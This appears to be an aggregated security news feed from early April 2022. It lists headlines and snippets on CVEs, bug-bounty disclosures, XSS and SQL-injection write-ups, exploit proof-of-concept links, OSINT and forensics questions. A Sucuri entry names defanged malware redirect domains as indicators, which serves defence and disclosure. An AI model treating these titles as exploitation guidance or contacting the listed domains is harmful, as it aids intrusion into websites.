    CVE-2022–21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit… Continue reading on Medium »
    Spoof as another Facebook user to report an impostor account
    When I was helping someone take down a poser/impostor account. I tried to check the request body on what’s going on behind the scene. The… Continue reading on Medium »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf早报 | 部分云祭扫APP涉侵害隐私;美国务院成立网络空间和数字政策局
    当地时间4月4日,美国国务院宣布成立其第一个网络空间和数字政策局(CDP),该局强调联邦领域的数字现代化。
  • Open

    SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
    Palantir Public disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1525200 - Bounty: $5000
    Private invitation links/tokens leak to third-party analytics site
    HackerOne disclosed a bug submitted by bigbug: https://hackerone.com/reports/1491127 - Bounty: $500
  • Open

    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    MacBook Pro M1 2021 with Filevault enabled, how long would it take to bruteforce the password ?
    How long would it take to bruteforce an 18 character long password with numbers, caps and symbols, on a MacBook pro that has filevault enabled ? submitted by /u/huffilyvest28 [link] [comments]

  • Open

    Utilizando Fontes Abertas (OSINT) para descobrir o local dos vídeos de Bucha Ucrânia
    Nos últimos dias acompanhamos as notícias sobre o massacre realizado pelos russos em Bucha, na Ucrânia. Os jornais noticiaram que o… Continue reading on Medium »
    Ukraine — Point de situation au 5 avril
    Les dernières 24h Continue reading on Medium »
  • Open

    What certifications would I need to get a job as a security analyst?
    I'm soon starting a job as a support engineer. So not IT. I want to move into a security analyst position. I'm open to other roles but I think this would be a good start. I'm thinking I'll get security+ first, but don't know where to go from there. I don't think I have the offensive security skills for OSCP quite yet. submitted by /u/Throwaway_deafgrape [link] [comments]
    Are hosted password managers safe?
    AFAIK all hosted password managers (Bitwarden, LastPass, Roboform, ...) are based on a master password. That master password you enter on their website. What is stopping these companies / password managers from snooping that password or actually being able to decrypt **all** your passwords that are saved on their servers? I'm not talking about e.g. KeePass and managing the password store yourself, or self-hosting Bitwarden. Maybe I am missing something, like local hashing of the master password, but am I mistaken that all hosted password managers suffer the same flaw? They could all have some method to decrypt my password stores because I just don't know what's happening on their servers? submitted by /u/moontear [link] [comments]
    Best resource today for learning reverse engineering?
    Hey you guys, I'm tasked with learning reverse engineering, and I'm wondering what's the best, relevant and up-to-date resource for doing this. I should mention I am already familiar with assembly and have read practical malware analysis in the past, so I have the fundamentals. I also watched a few related courses in Pluralsight in the past few days, but I still feel like I am nowhere near proficient or knowledgeble enough to reverse binaries on my own. Suggestions? Thanks a lot! submitted by /u/Altiverses [link] [comments]
    Dynamic SSH for Multiple Remotes
    I'm configuring an architecture where a client workstation sends commands to a server within my LAN. That server, in turn, is responsible for communicating with many different base stations. The issue is the server-to-base station communication is unencrypted. Is a Dynamic SSH/SOCKS proxy server the answer to this? I envision a client sending commands to a known port on the server, the server forwarding the commands to the SOCKS proxy running locally, and the proxy transmitting the commands through an SSH tunnel to the requisite external IP:PORT combination. My gap in understanding is that the SOCKS proxy will need to communicate with several remote hosts. I'm just not sure if this the right approach, or if the syntax supports this. These remote hosts all have SSH enabled, so this appears to be the most lightweight solution. submitted by /u/InfamousClyde [link] [comments]
    Apple's Vulnerability Patch
    I'm a student studying security! Apple says it has urgently released two zero-day patches that affect MacOS and iOS. These are likely to be abused and are said to allow threatened parties to interfere with or access kernel activities. Apple has released additional security updates for vulnerabilities and macOS failures affecting both macOS and iOS. Their discovery is said to have been made by anonymous researchers. MacOS and iOS AVD components allow applications to execute arbitrary code with kernel privileges. Does anyone know more about this? submitted by /u/zwrinerlucas [link] [comments]
    Moving from Web application pentesting to mobile.
    As I've become familiar with the web app penetration testing, now the company is moving to mobile. Whats the process like, can you share some materials or methodologies which can be useful. I have zero experience with mobile app exploitation and absolutely no idea about how it should go. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
  • Open

    WordPress Overtakes Magento in Credit Card Skimmers
    One of the most important monitoring tools in our security platform is our Sucuri SiteCheck scanner. It’s a free tool to scan your website for known malicious content and malware injections. The usage of SiteCheck also allows us to monitor trends in the website security landscape, and one of the things that it can spot are JavaScript-based credit card skimmers, often referred to in the security community as #MageCart infections. MageCart derives its name from the eCommerce CMS platform Magento, which we’ve written about extensively on this blog. Continue reading WordPress Overtakes Magento in Credit Card Skimmers at Sucuri Blog.
  • Open

    Countries’ vulnerability to food trade shocks from network-based simulations
    Article URL: https://www.nature.com/articles/s41598-022-08419-2 Comments URL: https://news.ycombinator.com/item?id=30910793 Points: 2 # Comments: 0
    Researchers uncover a hardware security vulnerability on Android phones
    Article URL: https://techxplore.com/news/2022-04-uncover-hardware-vulnerability-android.html Comments URL: https://news.ycombinator.com/item?id=30907952 Points: 1 # Comments: 0
  • Open

    a ton of general stuff
    https://download.tuxfamily.org/ submitted by /u/heywhatsyournam [link] [comments]
  • Open

    (SQLI) How I Hack Hundreds Of Students Data On Goverment Website
    Hola everybody, short story when i browsing on goverment website i found search bar, and first came in to my mind is “SQL INJECTION” Continue reading on Medium »
    Oda is launching our bug bounty program!
    We’re super proud to announce to the world that we are launching our official bug bounty program. While we always aim to establish the… Continue reading on Oda Product & Tech »
    My Pentest Log -13- (Bypass Renaming on File Upload)
    Greetings from the Hippodrome everyone, Continue reading on Medium »
    HACKED NOKIA WITH REFLECTED CROSS-SITE SCRIPTING VULNERABILITY….
    Hello, Hackers Welcome to my other write-up of Nokia Hacked with RXSS Vulnerability… Continue reading on Medium »
    2FA… To Bypass
    Learn various ways to bypass 2FA Continue reading on Medium »
  • Open

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren 对于挖矿的检测以及防御方案 by ourren CDN及特征隐匿Cobalt Strike by ourren SecWiki周刊(第422期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren 对于挖矿的检测以及防御方案 by ourren CDN及特征隐匿Cobalt Strike by ourren SecWiki周刊(第422期) by ourren 更多最新文章,请访问SecWiki
  • Open

    OAST (Out-of-band Application Security Testing)
    🔍 Introduction OAST는 Out-of-band application security testing의 약자로 OOB(Out-Of-Band)를 이용한 보안 테스팅 방법을 의미합니다. OOB 자체만으로 보안 이슈가 발생하는건 아니지만, 이를 통해서 Blind 계통의 취약점(Blind RCE, Blind XSS, Blind SSRF 등)을 식별하거나 중요정보를 유출하는 등 활용도가 아주 높은 분석 방법입니다. 그리고 OAST는 ZAP, Burp 등 DAST(Dynamic Application Security Testing)에서 주요 스캔 모델로 선택되기도 하며 이는 실제로 스캔 성능에 큰 영향을 미칩니다. (탐지율 상승) 🗡 Offensive techniques ZAP ZAP에선 OAST 메뉴를 통해서 OAST 도메인을 얻고, Polling할 수 있습니다.
  • Open

    TruffleHog V3: Automatically validate over 600 API Keys
    submitted by /u/wifihack [link] [comments]
    Discovering Vulnerabilities in WordPress Plugins at Scale
    submitted by /u/jonas02 [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    [api.krisp.ai] Race condition on /v2/seats endpoint allows bypassing the original seat limit
    Krisp disclosed a bug submitted by alp: https://hackerone.com/reports/1418419 - Bounty: $100
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Exploiting Insecure Docker Registry
    submitted by /u/tbhaxor [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    https://github.com/FourCoreLabs/spring4shell-exploit-poc submitted by /u/sciencestudent99 [link] [comments]

  • Open

    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »
  • Open

    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »
  • Open

    Vulnerability Excel template?
    I'm looking for a generic vulnerability register excel template to track risks within a number of products and some vulnerabilities outside of the products on the operational side of things. It seems like this should be a solved problem but Google isn't turning up any good results, any recommendations? We do have jira for when we want to actually schedule the work but due to the permissions setup and config I'd rather just keep that for work that is actively being worked on rather than cataloguing all vulnerabilities. submitted by /u/dbxp [link] [comments]
    Network support to security?
    Network Engineer to Security I am a network engineer at Cisco CCNP level. I had my security+ but it expired and I’ve always been interested in security but never nerded out on hack the box or anything. I want to transition from network support / engineering to cyber security but there are so many fields I’m having trouble. I know that since I have a deep background in core networking stuff network security makes sense for me, so I’m wondering if oscp is too app / windows at an enterprise focused. I kind of just want to pick a well respected cert and do it to completion cause I like following curriculums. I can learn on my own fine don’t mind cracking into a book but I like the organized start to finish and walk away with something that shows your time and effort structure of certifications. I like the syllabus of PWK for the most part I just don’t know if there’s a better path / course for me to take. I do meet all the prerequisite they say you need. My rough plan would be something like OSCP to transition from my current support role at large network vendor for Datacenter route switch, then after 1-2 years in a real security role, CISSP then consulting / management. I currently make $98k in networking, do you guys think I can jump to 120-130k if I get OSCP? submitted by /u/bearlapa [link] [comments]
    Now what?
    Finishing up a 14-week cybersecurity bootcamp, passed my CySA+ and got a pending 6-12 month contract as a Junior Analyst. My foot is officially in the door and I’m excited to get some hands on experience. That said, what are some “next steps” I should be focusing on to study or work towards? What other options beyond PenTesting are there after you’ve put in your time as a SOC grunt sifting through logs? I’m eager to just be making the transition into CyberSec, but want to keep the momentum and drive going and I’m curious what sort of roadmap others might suggest. Thanks! submitted by /u/DirtyMetis [link] [comments]
  • Open

    A step-by-step analysis of the Russian Turla backdoor called TinyTurla
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    SecWiki News 2022-04-03 Review
    从DARPA项目学习如何做安全研究 by ourren 欺骗Wappalyzer插件指纹识别 by tmr 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-03 Review
    从DARPA项目学习如何做安全研究 by ourren 欺骗Wappalyzer插件指纹识别 by tmr 更多最新文章,请访问SecWiki
  • Open

    Downloading of YT videos with search criteria
    Does anyone have a suggestion for a quick solution to download videos with specific surname in title before they are taken down? After this massacre in Ukrainian town Bucha I am afraid some prominent people will want to remove evidence for their support of this war. There is a particular mathematician I would like the world to remember. Some of his videos are already gone. submitted by /u/Base88Decode [link] [comments]
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    HACKED INSTAGRAM HANDLE OF SAMSUNG….
    Hello, Hackers Welcome Back to my Stored Link Hijacking Scenario... Continue reading on Medium »
    OOB & Blind Testing using DNS Exfiltration
    Previous: Private Burp Collaborator Continue reading on Medium »
    Albus Security Trainee Application
    Hi Medium folk, before We start I'll introduce myself, So I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco… Continue reading on Medium »
  • Open

    I'm trying to read some logs but almost all of them have these characters all throughout the logs. Why might this be the case and is there anyway of reading it in properly?
    submitted by /u/finnster145 [link] [comments]
    Windows Forensics Roadmap
    What is the best approach to learn and practice Windows forensics? Is there any effective roadmap including books, courses, practice website, etc… submitted by /u/BFF100F0 [link] [comments]
    Via the command line, can you search a forensic image and pull out files?
    Had some ideas to make life easier around the office. I wanted to use PowerShell (or software that is CMD based) to search an E01 file and pull out specific files in set locations. Effectively like any other GUI based viewer such as FTK imager (but via command line instead.) I don't know of any software/scripts that allow me to do this? any advice? An alternative is, I could auto mount an E01 file with some software, and then search the mounted file system for artefacts in set locations such as prefetch files. then export them to my workstation. What do you think? Cheers! submitted by /u/GEAR-IT-UP [link] [comments]
  • Open

    Broken Domain Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1434179 - Bounty: $100

  • Open

    Is there any good friendly conference for sharing security knowledge such as incident response or automation?
    As the title said, Are you good-friendly conferences suitable for sharing security knowledge such as security automation? (besides black hat and Defcon) submitted by /u/Calm_Scene [link] [comments]
    How valuable is the Certificate of Cloud Security Knowledge (CCSK)?
    Hi, I have been working in the cybersecurity space for around 2 years now and have now decided to go for this cert: Certificate of Cloud Security Knowledge (CCSK) If and when I do complete the CCSK, how valuable will this be for future job prospects? Thanks submitted by /u/securm0n [link] [comments]
    Syn flooding one port?
    So I’m analyzing a wire shark PCAP, and I’m dumbfounded as to what is going on maybe someone here can help. So I’m analyzing A lot of packets from one Machine to another. These are the same machines over and over. It seems like one machine is targeting port 636 over TCP. It looks like an Nmap SYN scan Except that the initiating machine keeps changing the ports it uses while targeting one single port on the other machine. So it goes like this: X==Randomport A:X[SYN]>>B:636 B:636[SYN, ACK]>>A:X A:X[ACK]>>B:636 A:X[TLSv1 Client Hello]>>B:636 B:636[RST, ACK]>>A:X Then it will repeat but X increments by 1. Anyone familiar with this type of pattern that can shed some light I have no idea what this even is. I know port 636 is ldap but I can’t figure out what the machine inquiring(A) is doing I don’t know any scans that actively target only one port. Anyway any help is greatly appreciated. submitted by /u/Forsaken-Summer-4844 [link] [comments]
  • Open

    Introducing PacketStreamer - packet capture for Kubernetes and other platforms
    submitted by /u/foobarbazwibble [link] [comments]
    DoS vulnerability in firmware v3.0.3 of KNXnet/IP Secure router SCN-IP100.03
    submitted by /u/robertguetzkow [link] [comments]
  • Open

    Ukraine — Point de situation au 3 avril
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / April 1
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Image & Geospatial OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information from image or video files… Continue reading on InfoSec Write-ups »
    How to identify fake photos and videos?
    I publish simple and free tools for verifying (checking) photographic and video content posted in the news. Continue reading on Medium »
    Search by nickname and username
    Today we will analyze the topic of checking nicknames in the process of OSINT research. Did you know that the average person usually has… Continue reading on Medium »
  • Open

    MULTIPLE TIMES I HACKED DUKE UNIVERSITY WITH RXSS VULNERABILITY!!!
    I’m Going to share one of my other Reflected Cross-Site Scripting Scenario. Continue reading on Medium »
    Design Flaw — A Tale of Permanent DOS
    This is my first writeup here on medium. Hope you enjoy it :). Feedbacks are always appreciated! Continue reading on Medium »
    Cross Site Scripting (XSS) for Dummies
    Hello everyone, my name is Кристиян Радев but many of you may know me as CypherTheThird. I have been studying ethical hacking for a while… Continue reading on Medium »
    Oceanland Testnet Bug Bounty Program
    Early bird catches the worm 🐛 Continue reading on Medium »
    SCENARIO OF REFLECTED CROSS-SITE SCRIPTING VULNERABILITY $$$$
    Today I’m going to share one of my RXSS Scenarios. Continue reading on Medium »
    Manager From Hackthebox
    Part Of Intro to Android Exploitation Continue reading on InfoSec Write-ups »
    View Friends List of any users using “View as” | Facebook Bug bounty
    Hello guys, Continue reading on Medium »
    (READ-PDF!) You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Deskripsi Book  Celebrate your little cuddle… Continue reading on Medium »
    Immunefi和stacks基金会发起Bug赏金计划
    Immunefi和stacks基金会发起Bug赏金计划。 Continue reading on Medium »
  • Open

    Lots of NSFW videos. Lots.
    submitted by /u/brother_p [link] [comments]
  • Open

    Found a useful Open Source Security Guide
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    FTK Imager unavailable?
    I was going to download FTK imager today, but the download link on both accessdata.com and exterro.com are broken. I went to their Twitter to check if there was any info there, but @AccessDataGroup is suspended and no info on @exterro. What's going on? submitted by /u/Bulletorpedo [link] [comments]
    Help with identifying names of transferred files
    I am trying to identify exactly what files did attacker transfer from his work PC to his USB drive. I have access to registry hives of attacked machine and vhdx file which i can mount and explore. Vhdx contains system logs in /System32/winevt/logs. Among those logs are Security.evtx , System.evtx and bunch of others. I know GUID of the USB that was used. The USB was encrypted with VeraCrypt. I know drive letters on which the USB was connected to the machine. I am trying to find all files that exist or existed on this USB. I tried to analyze the Secuirty.evtx file with windows events viewer and filtered for ID numbers 4656, 4660, 4663, 4670 but with no success. What am I doing wrong and what would be your methodology ? submitted by /u/threepairs [link] [comments]
    How does computer forensics people deal with amnesic systems like Tails?
    I used to use tails when I lived in China because I was too cheap to get a vpn (I ended up getting one anyways because tails is soooo slow). I still use it sometimes here back home in Sweden because it kind of makes me feel like haxor. Tails is supposedly completely amnesic and leaves 0 trace on the system after you've used it and shut it down. In Sweden, you need "physical" evidence to convict someone of a cyber crime. Just having logs of a specific IP doing something is (as far as I know) not enough, you also need logs or files etc on the suspects computer proving that the person did what they did. For example, if they have tracked that a specific IP address is buying illegal drugs, they also need to find evidence on the suspects computer of illegal activity. If Tails really is completely amnesic, would that not mean that its impossible to convict tails users of cyber crimes in countries with the same laws as Sweden unless you actually swat them and catch them in the act before they can shut it down? submitted by /u/CompoteDizzy [link] [comments]
  • Open

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
    How The Tables Have Turned: Analysis of Linux CVE-2022-10{15,16} in nf_tables
    Article URL: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/ Comments URL: https://news.ycombinator.com/item?id=30886025 Points: 1 # Comments: 0
  • Open

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
  • Open

    Shibboleth writeup | HackTheBox
    Shibboleth writeup | HackTheBox Continue reading on Medium »
    Remotely Dumping Chrome Cookies…Revisited
    TL;DR Security researcher Ron Masas (twitter: @RonMasas) recently wrote a tool (chrome-bandit) that extracts saved password from… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-02 Review
    加密数字货币合约交易的匿名性保护与对抗 by ourren XNU虚拟内存安全往事 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-02 Review
    加密数字货币合约交易的匿名性保护与对抗 by ourren XNU虚拟内存安全往事 by ourren 更多最新文章,请访问SecWiki
  • Open

    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1483327 - Bounty: $2500
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Beginning reverse engineering and exploitation
    Hello, I'm a 21 years old finishing his computer science university degree. I've always been fascinated by security and after having a look around, the two areas that intrigue me are reverse engineering/malware analysis and exploitation in general. The entry barriers in both these fields are very hard and the learning curve is very steep. I've seen the pwn2own videos for exploitation and oalabs for malware analysis and, I have to admit it, I understood like less than 5% of what they said, so it'll be a lot of work. ​ I've done some research and I came up with a roadmap for reverse engineering/malware analysis: -C/C++ and Assembly (for asm I think it's best to start with a simple architecture, like MIPS, then move into x32/x64) -start writing small programs and reverse them using both a debugger/disassembler, learning about how they translate into assembly -learn about common malware techniques: unpacking, persistence techniques, process injection, obfuscation, building a sandbox, building a honeypot for capturing samples and so on. ​ The problems start with exploitation, here I am completely lost. I was able to find some basic explanations and tutorials about buffer/heap overflows, integer overflow, double free, use after free, null pointer dereference. It seems however that going from theory to practice is very very hard. Another subject that goes hand in hand with exploitation is fuzzing, which of course I don't understand. ​ Last thing, I've seen a blog post where someone was able to get code execution on a program using DLL Sideloading, is this related to exploitation? ​ What resources, courses, books, tips, tricks can I follow in order to get better and better in these two fields? Last but not least, English is not my mother tongue, sorry for any mistakes. Thanks for taking your time to read and for an eventual reply, have a good day ahead! submitted by /u/worldpwner [link] [comments]
  • Open

    重磅!证监会修订境内企业赴境外上市相关保密和档案管理规定
    《规定》共十三条,进一步明确企业信息安全责任,为境内企业境外发行证券和上市活动中境内企业、机构在保密和档案管理方面提供更清晰明确的指引。
    欧盟法律草案为所有加密交易增加安全检查
    近期,欧洲议会在反洗钱新立法的道路上迈出了坚实的第一步,新提案主要针对加密货币交易。
    GitLab 存在漏洞,允许攻击者接管用户账户
    GitLab 爆出漏洞,目前已被解决。
    Wyze摄像头曝出大漏洞,近三年时间才修复
    Wyze Cam被曝存在三个严重的安全漏洞,黑客利用这些漏洞可以执行任意代码,完全控制摄像头,并且访问设备中的视频资源。
    杰哥教你用Python对Emotet投递的恶意Excel表格提取IoCs
    杰哥教你用Python开发威胁情报提取工具之商马Emotet初始宏代码Excel表格
    IT服务巨头遭勒索软件攻击,损失超4200万美元
    西班牙一家领先的业务流程外包(BPO)服务提供商表示,因遭遇勒索软件攻击导致其损失超过数千万美元。
  • Open

    XNU 虚拟内存安全往事
    作者:王铁磊 原文链接:https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 引言 虚拟内存 (Virtual Memory, VM) ⼦系统是现代操作系统基础核⼼组件,不仅负责虚拟地址和物理内存的映射关系,管理调度物理内存的使⽤,为程序开发提供统⼀透明的地址空间,同时也要为不同执⾏环境提供隔离,管控物理页⾯读、写、执⾏等权限,是系统安全的基...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ 继上文 漏洞分析 补丁 Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ 看推特又爆了cve,感觉挺牛逼的洞,于是分析一手。 官方公告 https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...
  • Open

    XNU 虚拟内存安全往事
    作者:王铁磊 原文链接:https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 引言 虚拟内存 (Virtual Memory, VM) ⼦系统是现代操作系统基础核⼼组件,不仅负责虚拟地址和物理内存的映射关系,管理调度物理内存的使⽤,为程序开发提供统⼀透明的地址空间,同时也要为不同执⾏环境提供隔离,管控物理页⾯读、写、执⾏等权限,是系统安全的基...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ 继上文 漏洞分析 补丁 Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ 看推特又爆了cve,感觉挺牛逼的洞,于是分析一手。 官方公告 https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...

  • Open

    WordPress Popunder Malware Redirects to Scam Sites
    Over the last year we’ve seen an ongoing malware infection which redirects website visitors to scam sites. So far this year our monitoring has detected over 3,000 websites infected with this injection this year and over 17,000 in total since we first detected it in March of 2021. The reported behaviour is always the same: After a few seconds of loading, the website will redirect to a dodgy scam site. Checking the Payload The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines, no doubt trying to stay hidden: Once we de-obfuscate this we see the following excerpt of the malicious code: The attackers are frequently adjusting the injection ever so slightly, but we notice the same domains over and over again initiating the redirect: amads[.]fun techmarket[.]ink uads[.]shop 5[.]188[.]62[.]157 uads[.]live like-a-dating[.]top techmarket[.]ink Source of Infection? Continue reading WordPress Popunder Malware Redirects to Scam Sites at Sucuri Blog.
  • Open

    LayerZero Security Update — April 2022
    If this past week has shown us anything, it’s that there is nothing more critical in this space than an absolute commitment to… Continue reading on LayerZero Official »
    Community-Owned Bug Bounties
    Hacks have become the new norm in crypto; from Twitter jokes about getting rugged, to sad posts about people losing their most prized… Continue reading on Medium »
    Small bugs are more dangerous than you think
    Chaining bugs for the win Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 2
    Hello Everyone, I hope you liked our previous article that was Cross-Site-Scripting (XSS) — Part 1, On that article, you learned about… Continue reading on Medium »
    My First RCE from N/A to Triaged (CVE-2021–3064)
    hello hackers, my name is Vivek Kumar & I started my bug bounty journey 8 months ago lets get back to the RCE its gonna very shot blog… Continue reading on Medium »
    Enter the Crow Games for the opportunity to earn NFTs!
    Complete some tasks, tell us about it, and join the Crow Clan!  After our recent airdrop of the crow clan NFT we have decided to grow the… Continue reading on Medium »
    Ambassador World Cup 2022 CTF
    This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. Continue reading on Medium »
  • Open

    Workspace configuration metadata disclosure
    Slack disclosed a bug submitted by kadusantiago: https://hackerone.com/reports/864489 - Bounty: $3500
    Subdomain Takeover on proxies.sifchain.finance pointing to vercel
    Sifchain disclosed a bug submitted by hrdfrdh: https://hackerone.com/reports/1487793 - Bounty: $100
    CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1492896 - Bounty: $4000
  • Open

    Ukraine — Point de situation au 2 avril
    Les dernières 24h Continue reading on Medium »
    Create Your Own Internet Archive — ArchiveBox
    Since 1996, Internet Archive is actively serving the purpose. What does it do? I keeps an archive of the things that were once found on… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Logging network users in OSINT
    Logging or establishing information about the device and connection of an Internet user is an important part of the process of… Continue reading on Medium »
    Telltale Signs of Russian Disinformation
    A wave of #disinformation emerged since Russia invaded Ukraine. Part 1 of a guide on how to take examples apart with #OSINT Continue reading on Medium »
    PGP genel anahtarlarından bilgi nasıl çıkarılır
    Bu yazıda PGP genel anahtarından nasıl bilgi çıkarılacağı hakkında konuşacağız. Continue reading on Medium »
    Find users by password and PGP key
    Today we’ll talk about how to identify an anonymous email user using a leaked password from it, as well as a PGP public key. Continue reading on Medium »
  • Open

    CVE-2017-16995 Ubuntu本地提权测试(任意地址读写利用)
    该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。
    lazysysadmin 靶场
    今天继续打靶场,这个靶场不难,但是我花了一天的时间,感觉被作者骗了。
    漏洞随笔:通过 Jet Protocol 任意提款漏洞浅谈 PDA 与 Anchor 账号验证
    目前在 Solana 上发生过多起黑客攻击事件均与账号校验问题有关,慢雾安全团队提醒广大 Solana 开发者,注意对账号体系进行严密的审查。
    FreeBuf早报 | 俄罗斯利用AcidRain攻击美国ViaSat;Wyze摄像头漏洞可访问视频源
    SentinelLabs 研究人员发现,美国卫星通信服务提供商 Viasat 遭受了一轮网络攻击,结果导致中东欧地区的服务出现了中断。
    创宇区块链|三月安全月报
    三月安全事件数量之多,创下2022开年新高,造成超 7 亿美元损失令人震惊!
    Driftingblues-1靶机渗透详细过程
    Driftingblues-1靶机渗透详细过程分享学习。
    Java 反序列化回显链研究:漏洞检测工程化
    Java 反序列化回显链研究:漏洞检测工程化学习分享。
    匿名者声称入侵了俄罗斯 Thozis 公司,未对 Rosaviatsia 发动攻击
    匿名者黑客组织(Anonymous)持续对俄罗斯实体和在该国运营的外国私营企业进行网络攻击。
    苹果发布紧急补丁以修复被积极利用的零日漏洞
    近日,苹果发布了一个紧急安全补丁,以解决两项被积极利用以入侵iPhone、iPad和Mac的零日漏洞。
    WAFNinja:一款绕过WAF的渗透测试工具
    在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡。
    FreeBuf周报 |Meta雇佣公司攻击TikTok引发数据隐私担忧;Spring漏洞补丁已更新
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!热点资讯1、国家信息安全漏洞共享平台收录Spring框架远程命令执行漏洞,安全补丁更新2、Facebook因算法漏洞连推糟糕内容,一直持续半年3、《华盛顿邮报》长文批评Meta雇佣公司攻击TikTok,引发数据隐私担忧4、WordPress网站被黑,利
    《信息安全技术 基于密码令牌的主叫用户可信身份鉴别技术规范》等征求意见稿发布
    四项国家标准的征求意见稿已经发布,面向全国公开征求意见。
    某厂2016实习招聘安全技术试题答案及解析
    鉴于曾经做过腾讯找招聘-安全技术笔试题目,故留此一记,以作怀念。
    OpenSSL 无限循环漏洞影响威联通 NAS 设备
    该漏洞如果被利用,将允许攻击者进行拒绝服务攻击。
    FBI调查了100多种勒索软件变体
    美联邦调查局(FBI)对100多种不同的勒索软件变体发起调查,发现其中很多已被用于各类勒索软件活动中。
    FreeBuf早报 | CNVD收录Spring 漏洞,补丁发布;Facebook算法漏洞持续半年
